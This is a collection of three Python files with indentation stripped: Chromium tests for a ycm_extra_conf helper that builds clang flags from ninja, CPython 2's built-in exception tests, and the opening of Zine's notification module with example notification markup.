def testNinjaIsAvailable(self):
p = subprocess.Popen(['ninja', '--version'], stdout=subprocess.PIPE)
_, _ = p.communicate()
self.assertFalse(p.returncode)
def testFindChromeSrc(self):
chrome_source = self.ycm_extra_conf.FindChromeSrcFromFilename(
os.path.join(self.chrome_root, 'chrome', 'one.cpp'))
self.assertEquals(chrome_source, self.chrome_root)
chrome_source = self.ycm_extra_conf.FindChromeSrcFromFilename(
os.path.join(self.chrome_root, 'one.cpp'))
self.assertEquals(chrome_source, self.chrome_root)
def testCommandLineForKnownCppFile(self):
command_line = self.ycm_extra_conf.GetClangCommandLineFromNinjaForSource(
self.out_dir, os.path.join(self.chrome_root, 'one.cpp'))
self.assertEquals(
command_line, ('../../fake-clang++ -Ia -isysroot /mac.sdk -Itag-one '
'../../one.cpp -o obj/one.o'))
def testCommandLineForUnknownCppFile(self):
command_line = self.ycm_extra_conf.GetClangCommandLineFromNinjaForSource(
self.out_dir, os.path.join(self.chrome_root, 'unknown.cpp'))
self.assertEquals(command_line, None)
def testGetClangOptionsForKnownCppFile(self):
clang_options = \
self.ycm_extra_conf.GetClangOptionsFromNinjaForFilename(
self.chrome_root, os.path.join(self.chrome_root, 'one.cpp'))
self.assertEquals(self.NormalizeStringsInList(clang_options), [
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-one'
])
def testOutDirNames(self):
out_root = os.path.join(self.chrome_root, 'out_with_underscore')
out_dir = os.path.join(out_root, 'gn')
shutil.move(os.path.join(self.chrome_root, 'out'),
out_root)
clang_options = \
self.ycm_extra_conf.GetClangOptionsFromNinjaForFilename(
self.chrome_root, os.path.join(self.chrome_root, 'one.cpp'))
self.assertIn('-I%s/a' % self.NormalizeString(out_dir),
self.NormalizeStringsInList(clang_options))
self.assertIn('-I%s/tag-one' % self.NormalizeString(out_dir),
self.NormalizeStringsInList(clang_options))
def testGetFlagsForFileForKnownCppFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'one.cpp'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-one'
])
def testGetFlagsForFileForUnknownCppFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'nonexistent.cpp'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default'
])
def testGetFlagsForFileForUnknownCppNotTestFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'test_nonexistent.cpp'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default'
])
def testGetFlagsForFileForUnknownHeaderFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'nonexistent.h'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default'
])
def testGetFlagsForFileForUnknownUnittestFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'nonexistent_unittest.cpp'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default-test'
])
def testGetFlagsForFileForUnknownBrowsertestFile2(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'nonexistent_browsertest.cpp'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default-test'
])
def testGetFlagsForFileForKnownHeaderFileWithAssociatedCppFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'three.h'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-three'
])
def testSourceFileWithNonClangOutputs(self):
# Verify assumption that four.cc has non-compiler-output listed as the first
# output.
p = subprocess.Popen(['ninja', '-C', self.out_dir, '-t',
'query', '../../four.cc'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True)
stdout, _ = p.communicate()
self.assertFalse(p.returncode)
self.assertEquals(stdout,
'../../four.cc:\n'
' outputs:\n'
' obj/linker-output.o\n'
' obj/four.o\n')
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'four.cc'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-four'
])
def testSourceFileWithOnlyNonClangOutputs(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'five.cc'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default'
])
def testGetFlagsForSysrootAbsPath(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'six.cc'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'--sysroot=/usr/lib/sysroot-image',
])
def testGetFlagsForSysrootRelPath(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'seven.cc'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'--sysroot=[SRC]/build/sysroot-image',
])
if __name__ == '__main__':
if not os.path.isfile('chromium.ycm_extra_conf.py'):
print('The test must be run from src/tools/vim/ directory')
sys.exit(1)
unittest.main()
|
|
# Python test set -- part 5, built-in exceptions
import os
import sys
import unittest
import pickle, cPickle
from test.test_support import (TESTFN, unlink, run_unittest, captured_output,
check_warnings, cpython_only)
from test.test_pep352 import ignore_deprecation_warnings
# XXX This is not really enough, each *operation* should be tested!
class ExceptionTests(unittest.TestCase):
def testReload(self):
# Reloading the built-in exceptions module failed prior to Py2.2, while it
# should act the same as reloading built-in sys.
try:
from imp import reload
import exceptions
reload(exceptions)
except ImportError, e:
self.fail("reloading exceptions: %s" % e)
def raise_catch(self, exc, excname):
try:
raise exc, "spam"
except exc, err:
buf1 = str(err)
try:
raise exc("spam")
except exc, err:
buf2 = str(err)
self.assertEqual(buf1, buf2)
self.assertEqual(exc.__name__, excname)
def testRaising(self):
self.raise_catch(AttributeError, "AttributeError")
self.assertRaises(AttributeError, getattr, sys, "undefined_attribute")
self.raise_catch(EOFError, "EOFError")
fp = open(TESTFN, 'w')
fp.close()
fp = open(TESTFN, 'r')
savestdin = sys.stdin
try:
try:
sys.stdin = fp
x = raw_input()
except EOFError:
pass
finally:
sys.stdin = savestdin
fp.close()
unlink(TESTFN)
self.raise_catch(IOError, "IOError")
self.assertRaises(IOError, open, 'this file does not exist', 'r')
self.raise_catch(ImportError, "ImportError")
self.assertRaises(ImportError, __import__, "undefined_module")
self.raise_catch(IndexError, "IndexError")
x = []
self.assertRaises(IndexError, x.__getitem__, 10)
self.raise_catch(KeyError, "KeyError")
x = {}
self.assertRaises(KeyError, x.__getitem__, 'key')
self.raise_catch(KeyboardInterrupt, "KeyboardInterrupt")
self.raise_catch(MemoryError, "MemoryError")
self.raise_catch(NameError, "NameError")
try: x = undefined_variable
except NameError: pass
self.raise_catch(OverflowError, "OverflowError")
x = 1
for dummy in range(128):
x += x # this simply shouldn't blow up
self.raise_catch(RuntimeError, "RuntimeError")
self.raise_catch(SyntaxError, "SyntaxError")
try: exec '/\n'
except SyntaxError: pass
self.raise_catch(IndentationError, "IndentationError")
self.raise_catch(TabError, "TabError")
# can only be tested under -tt, and is the only test for -tt
#try: compile("try:\n\t1.0/0.0\n \t1.0/0.0\nfinally:\n pass\n", '<string>', 'exec')
#except TabError: pass
#else: self.fail("TabError not raised")
self.raise_catch(SystemError, "SystemError")
self.raise_catch(SystemExit, "SystemExit")
self.assertRaises(SystemExit, sys.exit, 0)
self.raise_catch(TypeError, "TypeError")
try: [] + ()
except TypeError: pass
self.raise_catch(ValueError, "ValueError")
self.assertRaises(ValueError, chr, 10000)
self.raise_catch(ZeroDivisionError, "ZeroDivisionError")
try: x = 1 // 0
except ZeroDivisionError: pass
self.raise_catch(Exception, "Exception")
try: x = 1 // 0
except Exception, e: pass
def testSyntaxErrorMessage(self):
# make sure the right exception message is raised for each of
# these code fragments
def ckmsg(src, msg):
try:
compile(src, '<fragment>', 'exec')
except SyntaxError, e:
if e.msg != msg:
self.fail("expected %s, got %s" % (msg, e.msg))
else:
self.fail("failed to get expected SyntaxError")
s = '''while 1:
try:
pass
finally:
continue'''
if not sys.platform.startswith('java'):
ckmsg(s, "'continue' not supported inside 'finally' clause")
s = '''if 1:
try:
continue
except:
pass'''
ckmsg(s, "'continue' not properly in loop")
ckmsg("continue\n", "'continue' not properly in loop")
@cpython_only
def testSettingException(self):
# test that setting an exception at the C level works even if the
# exception object can't be constructed.
class BadException:
def __init__(self_):
raise RuntimeError, "can't instantiate BadException"
def test_capi1():
import _testcapi
try:
_testcapi.raise_exception(BadException, 1)
except TypeError, err:
exc, err, tb = sys.exc_info()
co = tb.tb_frame.f_code
self.assertEqual(co.co_name, "test_capi1")
self.assertTrue(co.co_filename.endswith('test_exceptions'+os.extsep+'py'))
else:
self.fail("Expected exception")
def test_capi2():
import _testcapi
try:
_testcapi.raise_exception(BadException, 0)
except RuntimeError, err:
exc, err, tb = sys.exc_info()
co = tb.tb_frame.f_code
self.assertEqual(co.co_name, "__init__")
self.assertTrue(co.co_filename.endswith('test_exceptions'+os.extsep+'py'))
co2 = tb.tb_frame.f_back.f_code
self.assertEqual(co2.co_name, "test_capi2")
else:
self.fail("Expected exception")
if not sys.platform.startswith('java'):
test_capi1()
test_capi2()
def test_WindowsError(self):
try:
WindowsError
except NameError:
pass
else:
self.assertEqual(str(WindowsError(1001)),
"1001")
self.assertEqual(str(WindowsError(1001, "message")),
"[Error 1001] message")
self.assertEqual(WindowsError(1001, "message").errno, 22)
self.assertEqual(WindowsError(1001, "message").winerror, 1001)
@ignore_deprecation_warnings
def testAttributes(self):
# test that exception attributes are happy
exceptionList = [
(BaseException, (), {'message' : '', 'args' : ()}),
(BaseException, (1, ), {'message' : 1, 'args' : (1,)}),
(BaseException, ('foo',),
{'message' : 'foo', 'args' : ('foo',)}),
(BaseException, ('foo', 1),
{'message' : '', 'args' : ('foo', 1)}),
(SystemExit, ('foo',),
{'message' : 'foo', 'args' : ('foo',), 'code' : 'foo'}),
(IOError, ('foo',),
{'message' : 'foo', 'args' : ('foo',), 'filename' : None,
'errno' : None, 'strerror' : None}),
(IOError, ('foo', 'bar'),
{'message' : '', 'args' : ('foo', 'bar'), 'filename' : None,
'errno' : 'foo', 'strerror' : 'bar'}),
(IOError, ('foo', 'bar', 'baz'),
{'message' : '', 'args' : ('foo', 'bar'), 'filename' : 'baz',
'errno' : 'foo', 'strerror' : 'bar'}),
(IOError, ('foo', 'bar', 'baz', 'quux'),
{'message' : '', 'args' : ('foo', 'bar', 'baz', 'quux')}),
(EnvironmentError, ('errnoStr', 'strErrorStr', 'filenameStr'),
{'message' : '', 'args' : ('errnoStr', 'strErrorStr'),
'strerror' : 'strErrorStr', 'errno' : 'errnoStr',
'filename' : 'filenameStr'}),
(EnvironmentError, (1, 'strErrorStr', 'filenameStr'),
{'message' : '', 'args' : (1, 'strErrorStr'), 'errno' : 1,
'strerror' : 'strErrorStr', 'filename' : 'filenameStr'}),
(SyntaxError, (), {'message' : '', 'msg' : None, 'text' : None,
'filename' : None, 'lineno' : None, 'offset' : None,
'print_file_and_line' : None}),
(SyntaxError, ('msgStr',),
{'message' : 'msgStr', 'args' : ('msgStr',), 'text' : None,
'print_file_and_line' : None, 'msg' : 'msgStr',
'filename' : None, 'lineno' : None, 'offset' : None}),
(SyntaxError, ('msgStr', ('filenameStr', 'linenoStr', 'offsetStr',
'textStr')),
{'message' : '', 'offset' : 'offsetStr', 'text' : 'textStr',
'args' : ('msgStr', ('filenameStr', 'linenoStr',
'offsetStr', 'textStr')),
'print_file_and_line' : None, 'msg' : 'msgStr',
'filename' : 'filenameStr', 'lineno' : 'linenoStr'}),
(SyntaxError, ('msgStr', 'filenameStr', 'linenoStr', 'offsetStr',
'textStr', 'print_file_and_lineStr'),
{'message' : '', 'text' : None,
'args' : ('msgStr', 'filenameStr', 'linenoStr', 'offsetStr',
'textStr', 'print_file_and_lineStr'),
'print_file_and_line' : None, 'msg' : 'msgStr',
'filename' : None, 'lineno' : None, 'offset' : None}),
(UnicodeError, (), {'message' : '', 'args' : (),}),
(UnicodeEncodeError, ('ascii', u'a', 0, 1, 'ordinal not in range'),
{'message' : '', 'args' : ('ascii', u'a', 0, 1,
'ordinal not in range'),
'encoding' : 'ascii', 'object' : u'a',
'start' : 0, 'reason' : 'ordinal not in range'}),
(UnicodeDecodeError, ('ascii', '\xff', 0, 1, 'ordinal not in range'),
{'message' : '', 'args' : ('ascii', '\xff', 0, 1,
'ordinal not in range'),
'encoding' : 'ascii', 'object' : '\xff',
'start' : 0, 'reason' : 'ordinal not in range'}),
(UnicodeTranslateError, (u"\u3042", 0, 1, "ouch"),
{'message' : '', 'args' : (u'\u3042', 0, 1, 'ouch'),
'object' : u'\u3042', 'reason' : 'ouch',
'start' : 0, 'end' : 1}),
]
try:
exceptionList.append(
(WindowsError, (1, 'strErrorStr', 'filenameStr'),
{'message' : '', 'args' : (1, 'strErrorStr'),
'strerror' : 'strErrorStr', 'winerror' : 1,
'errno' : 22, 'filename' : 'filenameStr'})
)
except NameError:
pass
for exc, args, expected in exceptionList:
try:
raise exc(*args)
except BaseException, e:
if type(e) is not exc:
raise
# Verify module name
self.assertEqual(type(e).__module__, 'exceptions')
# Verify no ref leaks in Exc_str()
s = str(e)
for checkArgName in expected:
self.assertEqual(repr(getattr(e, checkArgName)),
repr(expected[checkArgName]),
'exception "%s", attribute "%s"' %
(repr(e), checkArgName))
# test for pickling support
for p in pickle, cPickle:
for protocol in range(p.HIGHEST_PROTOCOL + 1):
new = p.loads(p.dumps(e, protocol))
for checkArgName in expected:
got = repr(getattr(new, checkArgName))
want = repr(expected[checkArgName])
self.assertEqual(got, want,
'pickled "%r", attribute "%s"' %
(e, checkArgName))
def testDeprecatedMessageAttribute(self):
# Accessing BaseException.message and relying on its value set by
# BaseException.__init__ triggers a deprecation warning.
exc = BaseException("foo")
with check_warnings(("BaseException.message has been deprecated "
"as of Python 2.6", DeprecationWarning)) as w:
self.assertEqual(exc.message, "foo")
self.assertEqual(len(w.warnings), 1)
def testRegularMessageAttribute(self):
# Accessing BaseException.message after explicitly setting a value
# for it does not trigger a deprecation warning.
exc = BaseException("foo")
exc.message = "bar"
with check_warnings(quiet=True) as w:
self.assertEqual(exc.message, "bar")
self.assertEqual(len(w.warnings), 0)
# Deleting the message is supported, too.
del exc.message
with self.assertRaises(AttributeError):
exc.message
@ignore_deprecation_warnings
def testPickleMessageAttribute(self):
# Pickling with message attribute must work, as well.
e = Exception("foo")
f = Exception("foo")
f.message = "bar"
for p in pickle, cPickle:
ep = p.loads(p.dumps(e))
self.assertEqual(ep.message, "foo")
fp = p.loads(p.dumps(f))
self.assertEqual(fp.message, "bar")
@ignore_deprecation_warnings
def testSlicing(self):
# Test that you can slice an exception directly instead of requiring
# going through the 'args' attribute.
args = (1, 2, 3)
exc = BaseException(*args)
self.assertEqual(exc[:], args)
self.assertEqual(exc.args[:], args)
def testKeywordArgs(self):
# test that builtin exception don't take keyword args,
# but user-defined subclasses can if they want
self.assertRaises(TypeError, BaseException, a=1)
class DerivedException(BaseException):
def __init__(self, fancy_arg):
BaseException.__init__(self)
self.fancy_arg = fancy_arg
x = DerivedException(fancy_arg=42)
self.assertEqual(x.fancy_arg, 42)
def testInfiniteRecursion(self):
def f():
return f()
self.assertRaises(RuntimeError, f)
def g():
try:
return g()
except ValueError:
return -1
# The test prints an unraisable recursion error when
# doing "except ValueError", this is because subclass
# checking has recursion checking too.
with captured_output("stderr"):
try:
g()
except RuntimeError:
pass
except:
self.fail("Should have raised KeyError")
else:
self.fail("Should have raised KeyError")
def testUnicodeStrUsage(self):
# Make sure both instances and classes have a str and unicode
# representation.
self.assertTrue(str(Exception))
self.assertTrue(unicode(Exception))
self.assertTrue(str(Exception('a')))
self.assertTrue(unicode(Exception(u'a')))
self.assertTrue(unicode(Exception(u'\xe1')))
def testUnicodeChangeAttributes(self):
# See issue 7309. This was a crasher.
u = UnicodeEncodeError('baz', u'xxxxx', 1, 5, 'foo')
self.assertEqual(str(u), "'baz' codec can't encode characters in position 1-4: foo")
u.end = 2
self.assertEqual(str(u), "'baz' codec can't encode character u'\\x78' in position 1: foo")
u.end = 5
u.reason = 0x345345345345345345
self.assertEqual(str(u), "'baz' codec can't encode characters in position 1-4: 965230951443685724997")
u.encoding = 4000
self.assertEqual(str(u), "'4000' codec can't encode characters in position 1-4: 965230951443685724997")
u.start = 1000
self.assertEqual(str(u), "'4000' codec can't encode characters in position 1000-4: 965230951443685724997")
u = UnicodeDecodeError('baz', 'xxxxx', 1, 5, 'foo')
self.assertEqual(str(u), "'baz' codec can't decode bytes in position 1-4: foo")
u.end = 2
self.assertEqual(str(u), "'baz' codec can't decode byte 0x78 in position 1: foo")
u.end = 5
u.reason = 0x345345345345345345
self.assertEqual(str(u), "'baz' codec can't decode bytes in position 1-4: 965230951443685724997")
u.encoding = 4000
self.assertEqual(str(u), "'4000' codec can't decode bytes in position 1-4: 965230951443685724997")
u.start = 1000
self.assertEqual(str(u), "'4000' codec can't decode bytes in position 1000-4: 965230951443685724997")
u = UnicodeTranslateError(u'xxxx', 1, 5, 'foo')
self.assertEqual(str(u), "can't translate characters in position 1-4: foo")
u.end = 2
self.assertEqual(str(u), "can't translate character u'\\x78' in position 1: foo")
u.end = 5
u.reason = 0x345345345345345345
self.assertEqual(str(u), "can't translate characters in position 1-4: 965230951443685724997")
u.start = 1000
self.assertEqual(str(u), "can't translate characters in position 1000-4: 965230951443685724997")
def test_unicode_errors_no_object(self):
# See issue #21134.
klasses = UnicodeEncodeError, UnicodeDecodeError, UnicodeTranslateError
for klass in klasses:
self.assertEqual(str(klass.__new__(klass)), "")
def test_badisinstance(self):
# Bug #2542: if issubclass(e, MyException) raises an exception,
# it should be ignored
class Meta(type):
def __subclasscheck__(cls, subclass):
raise ValueError()
class MyException(Exception):
__metaclass__ = Meta
pass
with captured_output("stderr") as stderr:
try:
raise KeyError()
except MyException, e:
self.fail("exception should not be a MyException")
except KeyError:
pass
except:
self.fail("Should have raised KeyError")
else:
self.fail("Should have raised KeyError")
with captured_output("stderr") as stderr:
def g():
try:
return g()
except RuntimeError:
return sys.exc_info()
e, v, tb = g()
self.assertTrue(e is RuntimeError, e)
self.assertIn("maximum recursion depth exceeded", str(v))
def test_new_returns_invalid_instance(self):
# See issue #11627.
class MyException(Exception):
def __new__(cls, *args):
return object()
with self.assertRaises(TypeError):
raise MyException
def test_assert_with_tuple_arg(self):
try:
assert False, (3,)
except AssertionError as e:
self.assertEqual(str(e), "(3,)")
def test_bad_exception_clearing(self):
# See issue 16445: use of Py_XDECREF instead of Py_CLEAR in
# BaseException_set_message gave a possible way to segfault the
# interpreter.
class Nasty(str):
def __del__(message):
del e.message
e = ValueError(Nasty("msg"))
e.args = ()
del e.message
# Helper class used by TestSameStrAndUnicodeMsg
class ExcWithOverriddenStr(Exception):
"""Subclass of Exception that accepts a keyword 'msg' arg that is
returned by __str__. 'msg' won't be included in self.args"""
def __init__(self, *args, **kwargs):
self.msg = kwargs.pop('msg') # msg should always be present
super(ExcWithOverriddenStr, self).__init__(*args, **kwargs)
def __str__(self):
return self.msg
class TestSameStrAndUnicodeMsg(unittest.TestCase):
"""unicode(err) should return the same message of str(err). See #6108"""
def check_same_msg(self, exc, msg):
"""Helper function that checks if str(exc) == unicode(exc) == msg"""
self.assertEqual(str(exc), msg)
self.assertEqual(str(exc), unicode(exc))
def test_builtin_exceptions(self):
"""Check same msg for built-in exceptions"""
# These exceptions implement a __str__ method that uses the args
# to create a better error message. unicode(e) should return the same
# message.
exceptions = [
SyntaxError('invalid syntax', ('<string>', 1, 3, '2+*3')),
IOError(2, 'No such file or directory'),
KeyError('both should have the same quotes'),
UnicodeDecodeError('ascii', '\xc3\xa0', 0, 1,
'ordinal not in range(128)'),
UnicodeEncodeError('ascii', u'\u1234', 0, 1,
'ordinal not in range(128)')
]
for exception in exceptions:
self.assertEqual(str(exception), unicode(exception))
def test_0_args(self):
"""Check same msg for Exception with 0 args"""
# str() and unicode() on an Exception with no args should return an
# empty string
self.check_same_msg(Exception(), '')
def test_0_args_with_overridden___str__(self):
"""Check same msg for exceptions with 0 args and overridden __str__"""
# str() and unicode() on an exception with overridden __str__ that
# returns an ascii-only string should return the same string
for msg in ('foo', u'foo'):
self.check_same_msg(ExcWithOverriddenStr(msg=msg), msg)
# if __str__ returns a non-ascii unicode string str() should fail
# but unicode() should return the unicode string
e = ExcWithOverriddenStr(msg=u'f\xf6\xf6') # no args
self.assertRaises(UnicodeEncodeError, str, e)
self.assertEqual(unicode(e), u'f\xf6\xf6')
def test_1_arg(self):
"""Check same msg for Exceptions with 1 arg"""
for arg in ('foo', u'foo'):
self.check_same_msg(Exception(arg), arg)
# if __str__ is not overridden and self.args[0] is a non-ascii unicode
# string, str() should try to return str(self.args[0]) and fail.
# unicode() should return unicode(self.args[0]) and succeed.
e = Exception(u'f\xf6\xf6')
self.assertRaises(UnicodeEncodeError, str, e)
self.assertEqual(unicode(e), u'f\xf6\xf6')
def test_1_arg_with_overridden___str__(self):
"""Check same msg for exceptions with overridden __str__ and 1 arg"""
# when __str__ is overridden and __unicode__ is not implemented
# unicode(e) returns the same as unicode(e.__str__()).
for msg in ('foo', u'foo'):
self.check_same_msg(ExcWithOverriddenStr('arg', msg=msg), msg)
# if __str__ returns a non-ascii unicode string, str() should fail
# but unicode() should succeed.
e = ExcWithOverriddenStr('arg', msg=u'f\xf6\xf6') # 1 arg
self.assertRaises(UnicodeEncodeError, str, e)
self.assertEqual(unicode(e), u'f\xf6\xf6')
def test_many_args(self):
"""Check same msg for Exceptions with many args"""
argslist = [
(3, 'foo'),
(1, u'foo', 'bar'),
(4, u'f\xf6\xf6', u'bar', 'baz')
]
# both str() and unicode() should return a repr() of the args
for args in argslist:
self.check_same_msg(Exception(*args), repr(args))
def test_many_args_with_overridden___str__(self):
"""Check same msg for exceptions with overridden __str__ and many args"""
# if __str__ returns an ascii string / ascii unicode string
# both str() and unicode() should succeed
for msg in ('foo', u'foo'):
e = ExcWithOverriddenStr('arg1', u'arg2', u'f\xf6\xf6', msg=msg)
self.check_same_msg(e, msg)
# if __str__ returns a non-ascii unicode string, str() should fail
# but unicode() should succeed
e = ExcWithOverriddenStr('arg1', u'f\xf6\xf6', u'arg3', # 3 args
msg=u'f\xf6\xf6')
self.assertRaises(UnicodeEncodeError, str, e)
self.assertEqual(unicode(e), u'f\xf6\xf6')
@cpython_only
def test_exception_with_doc(self):
import _testcapi
doc2 = "This is a test docstring."
doc4 = "This is another test docstring."
self.assertRaises(SystemError, _testcapi.make_exception_with_doc,
"error1")
# test basic usage of PyErr_NewException
error1 = _testcapi.make_exception_with_doc("_testcapi.error1")
self.assertIs(type(error1), type)
self.assertTrue(issubclass(error1, Exception))
self.assertIsNone(error1.__doc__)
# test with given docstring
error2 = _testcapi.make_exception_with_doc("_testcapi.error2", doc2)
self.assertEqual(error2.__doc__, doc2)
# test with explicit base (without docstring)
error3 = _testcapi.make_exception_with_doc("_testcapi.error3",
base=error2)
self.assertTrue(issubclass(error3, error2))
# test with explicit base tuple
class C(object):
pass
error4 = _testcapi.make_exception_with_doc("_testcapi.error4", doc4,
(error3, C))
self.assertTrue(issubclass(error4, error3))
self.assertTrue(issubclass(error4, C))
self.assertEqual(error4.__doc__, doc4)
# test with explicit dictionary
error5 = _testcapi.make_exception_with_doc("_testcapi.error5", "",
error4, {'a': 1})
self.assertTrue(issubclass(error5, error4))
self.assertEqual(error5.a, 1)
self.assertEqual(error5.__doc__, "")
def test_main():
run_unittest(ExceptionTests, TestSameStrAndUnicodeMsg)
if __name__ == '__main__':
test_main()
|
|
# -*- coding: utf-8 -*-
"""
zine.notifications
~~~~~~~~~~~~~~~~~~
This module implements an extensible notification system. Plugins can
provide different kinds of notification systems (like email, jabber etc.)
Each user can subscribe to different kinds of events. The general design
is inspired by Growl.
:copyright: (c) 2010 by the Zine Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from datetime import datetime
from urlparse import urlsplit
from werkzeug import url_unquote
from zine.models import NotificationSubscription
from zine.application import get_application, get_request, render_template
from zine.privileges import BLOG_ADMIN, ENTER_ACCOUNT_PANEL, MODERATE_COMMENTS,\
MODERATE_OWN_PAGES, MODERATE_OWN_ENTRIES
from zine.utils.zeml import parse_zeml
from zine.utils.mail import send_email
from zine.i18n import lazy_gettext
__all__ = ['DEFAULT_NOTIFICATION_TYPES', 'NotificationType']
DEFAULT_NOTIFICATION_TYPES = {}
def send_notification(type, message, user=Ellipsis):
"""Convenience function. Get the application object and deliver the
notification to it's NotificationManager.
The message must be a valid ZEML formatted message. The following
top-level elements are available for marking up the message:
title
The title of the notification. Some systems may only transmit this
part of the message.
summary
An optional quick summary. If the text is short enough it can be
omitted and the system will try to transmit the longtext in that
case. The upper limit for the summary should be around 100 chars.
details
If given this may either contain a paragraph with textual information
or an ordered or unordered list of text or links. The general markup
rules apply.
longtext
The full text of this notification. May contain some formattings.
actions
If given this may contain an unordered list of action links. These
links may be transmitted together with the notification.
Additionally if there is an associated page with the notification,
somewhere should be a link element with a "selflink" class. This can be
embedded in the longtext or actions (but any other element too).
Example markup::
<title>New comment on "Foo bar baz"</title>
<summary>Mr. Miracle wrote a new comment: "This is awesome."</summary>
<details>
<ul>
<li><a href="http://miracle.invalid/">Mr. Miracle</a>
<li><a href="mailto:[email protected]">E-Mail</a>
</ul>
</details>
<longtext>
<p>This is awesome. Keep it up!
<p>Love your work
</longtext>
<actions>
<ul>
<li><a href="http://.../link" class="selflink">all comments</a>
<li><a href="http://.../?action=delete">delete it</a>
<li><a href="http://.../?action=approve">approve it</a>
</ul>
</actions>
Example plaintext rendering (e-mail)::
Subject: New comment on "Foo bar baz"
Mr. Miracle http://miracle.invalid/
E-Mail [email protected]
> This is awesome. Keep it up!
> Love your work.
Actions:
- delete it http://.../?action=delete
- approve it http://.../?action=approve
Example IM notification rendering (jabber)::
New comment on "Foo bar baz." Mr. Miracle wrote anew comment:
"This is awesome". http://.../link
"""
get_application().notification_manager.send(
Notification(type, message, user)
)
def send_notification_template(type, template_name, user=Ellipsis, **context):
"""Like `send_notification` but renders a template instead."""
notification = render_template(template_name, **context)
send_notification(type, notification, user)
class NotificationType(object):
"""There are different kinds of notifications. E.g. you want to
send a special type of notification after a comment is saved.
"""
